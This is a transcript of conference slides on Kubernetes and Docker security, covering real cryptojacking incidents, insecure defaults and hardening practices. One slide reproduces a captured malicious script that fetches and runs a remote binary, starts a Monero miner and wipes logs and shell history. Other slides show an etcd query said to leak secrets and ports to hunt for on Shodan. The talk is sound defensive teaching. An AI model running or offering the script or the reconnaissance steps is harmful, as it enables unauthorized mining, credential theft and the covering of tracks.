containers exploits surprises and security with elissa
play

Containers: Exploits, Surprises, And Security with Elissa Shevinsky - PowerPoint PPT Presentation

Mar 18, 2023 •287 likes •954 views

Containers: Exploits, Surprises, And Security with Elissa Shevinsky COO at SoHo Token Labs Editor of Lean Out #RVASec @ElissaBeth on twitter @Elissa_is_offmessage on Instagram this was Silicon Valley in 2011 Containers are eating

  2. Containers: Exploits, Surprises, And Security with Elissa Shevinsky COO at SoHo Token Labs Editor of “Lean Out” #RVASec @ElissaBeth on twitter @Elissa_is_offmessage on Instagram

  3. this was Silicon Valley in 2011

  4. “Containers are eating software” -me, in 2018

  5. Also True: Insecure Defaults are eating your AWS Instances

  7. Docker’s Promise: Among Other Things, is Security

  10. What is Kubernetes? According to Google, Kubernetes is “the industry-leading open source container orchestrator which powers Kubernetes Engine”

  11. Diagram: Isolation in Kubernetes

  14. Sure, there are fancy exploits

  15. but it’s really about that good ol’ misconfiguration

  16. The core Kubernetes team calls many security issues “misconfiguration.” But what do you call it when misconfigurations are the default?

  17. Kubernetes has so many fun attack vectors ….. many of which are intentionally enabled by default

  18. Hacking Kubernetes

  19. We’re used to taking strong measures to protect user data. But what about keeping hackers away from those S3 buckets?

  22. The Hack: • Monero miners infiltrated a Kubernetes consoles, which was not password protected. • Within one Kubernetes pod, access credentials were exposed to Tesla’s AWS environment • This contained an Amazon S3 bucket that had sensitive data such as telemetry.

  23. Detection: • The hackers hid their IP address behind Cloudflare • Mining software was configured to listen on a non-standard port • CPU usage was not very high. The hackers likely configured the mining software to keep CPU low to evade detection

  24. Lessons from the Hack of Tesla’s S3 via Kubernetes: • Secure your Kubernetes with passwords • Update and Monitor Configurations (defaults aren’t enough) • Monitor Network Traffic • Hackers will leverage one resource to gain access to another Kubernetes can be a gateway to S3. h/t to Redlock for their research here: https://blog.redlock.io/cryptojacking-tesla

  25. the following exploit has been an issue on Github since 2015 and was was *just* patched The Github comments by Kubernetes team members are … interesting

  26. single node Kubernetes deployment running on top of Alpine Linux. First indicator of compromise was a suspicious process running as a child of the docker daemon: Another example: h/t Alexander Urcioli for documenting

  27. more crypto mining: single node Kubernetes deployment running on top of Alpine Linux. curling the endpoints leads to…. Mining Proxy Online Another example: h/t Alexander Urcioli for documenting

  28. Kube.lock script (used to mine Monero) #!/bin/bash yum install wget -y apt-get install wget -y PS2=$(ps aux | grep udevs | grep -v "grep" | wc -l) if [ $PS2 -eq 0 ]; then rm -rf /tmp/udevs* wget https://transfer.sh/JyRqn/nodepadxx --no-check-certificate -O /tmp/udevs fi if [[ $? -ne 0 && $PS2 -eq 0 ]]; then curl -sk https://transfer.sh/JyRqn/nodepadxx -o /tmp/udevs fi chmod +x /tmp/udevs chmod 777 /tmp/udevs if [ $PS2 -eq 0 ]; then /tmp/udevs -o stratum+tcp://pool.zer0day.ru:8080 -u NewWorld -p NewWorld --safe -B fi if [[ $? -ne 0 && $PS2 -eq 0 ]]; then echo $? wget https://transfer.sh/9uRre/glibc-2.14.tar.gz --no-check-certificate -O /tmp/glibc-2.14.tar.gz && tar zxvf /tmp/ glibc-2.14.tar.gz -C /tmp/ && export LD_LIBRARY_PATH=/tmp/opt/glibc-2.14/lib:$LD_LIBRARY_PATH && /tmp/udevs -o stratum+tcp://pool.zer0day.ru:8080 -u NewWorld -p NewWorld --safe -B && echo "" > /var/log/wtmp && echo "" > /var/ log/secure && history -c fi

  29. The Hack: • kubernetes api-server was publicly exposed to the internet — but protected with certificate authentication • By default, requests to the kubelet’s HTTPS endpoint that are not rejected by other configured authentication methods used to be treated as anonymous requests, and given a username of system:anonymous and a group of system: unauthenticated

  30. Unless you specified some flags on Kubelet, it’s default mode of operation is to accept unauthenticated API requests. Keep in mind that in order for master -> node communication to work, the Kubernetes API server must be able to talk to kubelet on your nodes.

  35. “not a CVE”

  36. Lessons • Very important to pay attention to configuration. Both Kubernetes and Docker benefit from configuration optimizations. • Patch your Kubernetes. This issue was just accepted as a pull request earlier this year. Only the latest versions will have this issue fixed.

  37. Exploiting Kubernetes for fun and profit through their appropriate disclosure processes

  38. Tools for folks like us

  41. 2379/TCP Etcd Port The HTTP service on 2379/TCP is the default etcd service for your Kubernets instance. The API interface is accessible and not secured by default! http://<kuberenets IP>:2379/v2/keys/?recursive=true It’ll leak internal passwords, AWS keys, certificates, private keys, encryption keys and more…

  43. From Kubernetes Guide to “Securing a Cluster”

  44. Common Vulnerabilities to look for on Shodan Unsecured Dashboards Port 10250/TCP Open Port 2379/TCP Open https://medium.com/@netscylla/kubernetes-or-kuberpwn-586c687d5459

  45. Tools for Hardening

  46. Clair by CoreOS Static Analysis of Vulnerabilities in Appc and Docker containers

  49. Configuration Management: Sonobuoy by Heptio

  50. Best Practice via CIS benchmarks It’s a very long list.

  51. Best Practice via CIS benchmarks Highlights: Enable built-in Linux security measures, SELinux and Seccomp profiles. Allow fine grained control over the workloads running in the node

  52. Container registry Vulnerability Scanning by Google

  53. Grafeas

  54. Kubernetes has so many fun attack vectors ….. many of which are intentionally enabled by default

  55. Best Practices, via the Kubernetes Team • Implement Continuous Security Vulnerability Scanning – Containers might include outdated packages with known vulnerabilities (CVEs). This cannot be a ‘one off’ process, as new vulnerabilities are published every day. • Regularly Apply Security Updates to Your Environment – Once vulnerabilities are found in running containers, you should always update the source image and redeploy the containers. Upgrading containers is extremely easy with the Kubernetes rolling updates feature - this allows gradually updating a running application by upgrading its images to the latest version. https://kubernetes.io/blog/2016/08/security-best-practices-kubernetes-deployment

  56. Best Practices, via the Kubernetes Team • Ensure That Only Authorized Images are Used in Your Environment • Limit Direct Access to Kubernetes Nodes • Create Administrative Boundaries between Resources • Define Resource Quota • Implement Network Segmentation • Log Everything https://kubernetes.io/blog/2016/08/security-best-practices-kubernetes-deployment

  57. Best Practices, via Docker • Only trusted users should be allowed to control your Docker daemon. • Best practice is be to remove all capabilities except those explicitly required for their processes. Restricting access and capabilities reduces the amount of surface area potentially vulnerable to attack. https://docs.docker.com/engine/security/security/ https://d3oypxn00j2a10.cloudfront.net/assets/img/Docker%20Security/WP_Intro_to_container_security_03.20.2015.pdf

  58. Best Practices, via Docker • Proper tooling around application images are critical to sound security practices. (Docker has built some tools.) Docker Bench for Security is a meta-script that checks for dozens of common best-practices around deploying Docker containers in production • Run your Linux kernels with GRSEC and PAX. These sets of patches add several kernel- level safety checks, both at compile-time and run- time that attempt to defeat or make some common exploitation techniques more difficult. • Docker users can expand upon the default con guration to further improve security. https://docs.docker.com/engine/security/security/ https://d3oypxn00j2a10.cloudfront.net/assets/img/Docker%20Security/WP_Intro_to_container_security_03.20.2015.pdf

  59. Security and Container Hardening Best Practices we’re gonna review 5 straightforward techniques (that you likely already know)

  60. Do Updates

  61. Minimize Attack Surface do you need that extra code? that proprietary code with who knows how many vulnerabilities?

  62. Optimize Your Configuration “It’s not a CVE, it's a misconfiguration”

  63. “Know Your Network” - Andrew Case Monitor your network for unusual activity.

  64. take it off the public internet you can put your containers behind a VPN

  66. THANK YOU to RVASec and to this Community

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Everything you need to know about Containers Security Track Containers Jos Manuel Ortega

Everything you need to know about Containers Security Track Containers Jos Manuel Ortega

Everything you need to know about Containers Security Track Containers Jos Manuel Ortega @jmortegac Agenda Introduction to containers security Linux Containers(LXC) Docker Security Security pipeline &amp;&amp; Container

807 views • 57 slides
Unprivileged Containers Jess Frazelle, @jessfraz How do containers help security? Containers are

Unprivileged Containers Jess Frazelle, @jessfraz How do containers help security? Containers are

Unprivileged Containers Jess Frazelle, @jessfraz How do containers help security? Containers are not going to be the answer to preventing your application from being compromised, but they can limit the damage from a compromise. How do

823 views • 25 slides
Should I Worry? A Cross-Cultural Examination of Account Security Incident Response Elissa

Should I Worry? A Cross-Cultural Examination of Account Security Incident Response Elissa

Should I Worry? A Cross-Cultural Examination of Account Security Incident Response Elissa M. Redmiles @eredmil1 eredmiles@cs.umd.edu How do users respond when their accounts are attacked? Elissa M. Redmiles 2 Cross cultural interview

426 views • 25 slides
Security vulnerabilities, exploits and attack patterns: 15 years of art, pseudo-science, fun &amp;

Security vulnerabilities, exploits and attack patterns: 15 years of art, pseudo-science, fun &amp;

15th USENIX Security Symposium | July 31st August 4th 2006 | Vancouver, B.C. - Canada Security vulnerabilities, exploits and attack patterns: 15 years of art, pseudo-science, fun &amp; profit Ivn Arce Core Security Technologies Humboldt

767 views • 41 slides
Hacking Appliances: Ironic exploits in security products Ben Williams 9:22 AM Proposition

Hacking Appliances: Ironic exploits in security products Ben Williams 9:22 AM Proposition

9:22 AM Hacking Appliances: Ironic exploits in security products Ben Williams 9:22 AM Proposition There is a temptation to think of Security Appliances as impregnable fortresses, this is definitely a mistake. Security Appliance (noun) -

1.1k views • 63 slides
Exploding the Linux Container Host Presenter: Ben Corrie (@bensdoings) Containers vs VMs

Exploding the Linux Container Host Presenter: Ben Corrie (@bensdoings) Containers vs VMs

Exploding the Linux Container Host Presenter: Ben Corrie (@bensdoings) Containers vs VMs Google Wisdom: VMs and Containers are similar but different Try running containers in VMs for security Containers are best for scale-out

314 views • 17 slides
Agenda Container Security Concerns Addressing Container Security Security @ SUSE True or False?

Agenda Container Security Concerns Addressing Container Security Security @ SUSE True or False?

Agenda Container Security Concerns Addressing Container Security Security @ SUSE True or False? Containers are inherently insecure. Some Learnings from an Enterprise Study 94%: Containers have security implications 31%: Worried

490 views • 24 slides
CO 445H SECURE DESIGN PRIN INCIPLES JAVA SECURITY ROP AND ADVANCED EXPLOITS Dr. Ben Livshits

CO 445H SECURE DESIGN PRIN INCIPLES JAVA SECURITY ROP AND ADVANCED EXPLOITS Dr. Ben Livshits

CO 445H SECURE DESIGN PRIN INCIPLES JAVA SECURITY ROP AND ADVANCED EXPLOITS Dr. Ben Livshits Some Survey Responses 2 Sunsetting Google+ 3 https://www.blog.google/technology/safety-security/project-strobe/ Details 4 Notifications 5

1.12k views • 64 slides
Containers can actually improve your security story(!) Maya Kaczorowski, Google Cloud June 12

Containers can actually improve your security story(!) Maya Kaczorowski, Google Cloud June 12

Containers can actually improve your security story(!) Maya Kaczorowski, Google Cloud June 12 2019 Maya Kaczorowski Security PM, Google Cloud @MayaKaczorowski Objection: My security team is opposed to containers and Kubernetes 3

649 views • 41 slides
Bio$ ! 8#years#in#a#security#lab# ! Technology#lover# ! Analysis#techniques#//#exploits# !

Bio$ ! 8#years#in#a#security#lab# ! Technology#lover# ! Analysis#techniques#//#exploits# !

Bio$ ! 8#years#in#a#security#lab# ! Technology#lover# ! Analysis#techniques#//#exploits# ! Involved#from#sample#prepara&gt;on#to#report#wri&gt;ng# ! Op&gt;cal#systems#setup## ! Sample#prepara&gt;on# ! Delayering# ! Imagery# ! SoCware#developments #

1.11k views • 72 slides
The Userland Exploits of Pangu 8 @PanguTeam Outline Introduction New Security

The Userland Exploits of Pangu 8 @PanguTeam Outline Introduction New Security

The Userland Exploits of Pangu 8 @PanguTeam Outline Introduction New Security Enhancements in iOS 8 Pangu 8 Overview Bypass Team ID Validation by Teasing the Trust-Cache Bypass Code Signing Validation by Segment Overlapping

821 views • 59 slides
Worm enabling exploits Cyber Security Lab Spring 10 Background reading Worm Anatomy and

Worm enabling exploits Cyber Security Lab Spring 10 Background reading Worm Anatomy and

Worm enabling exploits Cyber Security Lab Spring 10 Background reading Worm Anatomy and Model http://portal.acm.org/citation.cfm?id=948196 Smashing the Stack for Fun and Profit

525 views • 36 slides
Improving Trust in Containers Matthew Garrett @mjg59 | mjg59@coreos.com | coreos.com

Improving Trust in Containers Matthew Garrett @mjg59 | mjg59@coreos.com | coreos.com

Improving Trust in Containers Matthew Garrett @mjg59 | mjg59@coreos.com | coreos.com Containers are great Containers are resource efficient Containers make deployment easy Containers can be monitored easily Containers are secure But are

508 views • 38 slides
Surviving the Zombie Apocalypse Security in the Cloud Containers, KVM and Xen Ian Jackson

Surviving the Zombie Apocalypse Security in the Cloud Containers, KVM and Xen Ian Jackson

Surviving the Zombie Apocalypse Security in the Cloud Containers, KVM and Xen Ian Jackson &lt;ian.jackson@eu.citrix.com&gt; FOSDEM 2015 originally based on a talk and research by George Dunlap &quot;Some people make the mistake of thinking

328 views • 6 slides
1 Agenda Docker world Containers VS Virtual machine Security concerns Conclusion Whoami

1 Agenda Docker world Containers VS Virtual machine Security concerns Conclusion Whoami

12.03.2019 Docker security 1 Agenda Docker world Containers VS Virtual machine Security concerns Conclusion Whoami M.Sc Computer Security M.Sc Software Development Worked previously as an embedded software developer Actually

586 views • 54 slides
C and C++ vulnerability exploits and countermeasures Frank Piessens

C and C++ vulnerability exploits and countermeasures Frank Piessens

C and C++ vulnerability exploits and countermeasures Frank Piessens (Frank.Piessens@cs.kuleuven.be) These slides are based on the paper: Low-level Software Security by Example by Erlingsson, Younan and Piessens KATHOLIEKE Secappdev

1.03k views • 77 slides
The effects of stellar activity on detecting and characterising exoplanets Suzanne Aigrain R.

The effects of stellar activity on detecting and characterising exoplanets Suzanne Aigrain R.

The effects of stellar activity on detecting and characterising exoplanets Suzanne Aigrain R. Angus, J. Barstow, V. Rajpaul, E. Gillen, H. Parviainen, B. Pope, S. Roberts, A. McQuillan, N. Gibson, T. Mazeh, F . Pont, S. Zucker Timescales Solar

468 views • 17 slides
Webinar agenda Job-Ready, Set, Go! Connecting Immigrant and Refugee Youth to Employment

Webinar agenda Job-Ready, Set, Go! Connecting Immigrant and Refugee Youth to Employment

Webinar agenda Job-Ready, Set, Go! Connecting Immigrant and Refugee Youth to Employment Presentation by Gabriel Lenot, Operations Manager, 1. Apprenticeship and Internships, Mozak RH (Paris, France) Presentation by Saba Mosazghi, Mentor

478 views • 28 slides
Observation of the Forbush decrease of 22 th June 2015 with the LAGO detector in Brazil Anderson

Observation of the Forbush decrease of 22 th June 2015 with the LAGO detector in Brazil Anderson

Observation of the Forbush decrease of 22 th June 2015 with the LAGO detector in Brazil Anderson Campos Fauth 1 , Henrique Vieira de Souza 1 for the LAGO Collaboration 2 1 Instituto de Fsica Gleb Wataghin - Unicamp, Brazil 2 full list of members

202 views • 16 slides
CS 335 Software Development Introduction Jan 13, 2014 Healthcare.gov must verify a would-be

CS 335 Software Development Introduction Jan 13, 2014 Healthcare.gov must verify a would-be

CS 335 Software Development Introduction Jan 13, 2014 Healthcare.gov must verify a would-be applicants eligibility from Homeland Security, IRS and Social Security systems, in real time, plus enroll members electronically to any

346 views • 8 slides
NORDUShare Click to edit Master subtitle style tf-storage 2010, Utrecht 04-03-10 NORDUnet

NORDUShare Click to edit Master subtitle style tf-storage 2010, Utrecht 04-03-10 NORDUnet

NORDUnet NORDUnet Nordic Infrastructure for Research &amp; Education Nordic infrastructure for Research &amp; Education NORDUShare Click to edit Master subtitle style tf-storage 2010, Utrecht 04-03-10 NORDUnet NORDUnet Nordic

340 views • 17 slides
A KdV soliton gas: asymptotic analysis via RiemannHilbert problems Manuela Girotti joint with

A KdV soliton gas: asymptotic analysis via RiemannHilbert problems Manuela Girotti joint with

Background and motivations Initial conditions Large time behaviour To be continued... A KdV soliton gas: asymptotic analysis via RiemannHilbert problems Manuela Girotti joint with Ken McLaughling (CSU) and Tamara Grava (SISSA-Bristol)

1.64k views • 77 slides
Spectral theory of soliton and breather gases in the focusing NLS equation Gennady EL (joint work

Spectral theory of soliton and breather gases in the focusing NLS equation Gennady EL (joint work

Spectral theory of soliton and breather gases in the focusing NLS equation Gennady EL (joint work with Alexander Tovbis , Central Florida) arXiv:1910.05732 Waves, Coherent Structures, and Turbulence, UEA 31 October 2019 1 40 Collaborators

716 views • 40 slides
Lecture 2: Semi-topological solitons in multiple dimensions Joachim Brand Canberra International

Lecture 2: Semi-topological solitons in multiple dimensions Joachim Brand Canberra International

Lecture 2: Semi-topological solitons in multiple dimensions Joachim Brand Canberra International Physics Summer School: 2018 Topological Matter To be covered: Solitons in quantum gases Lecture 1: Solitons and topological solitons

379 views • 22 slides

More recommend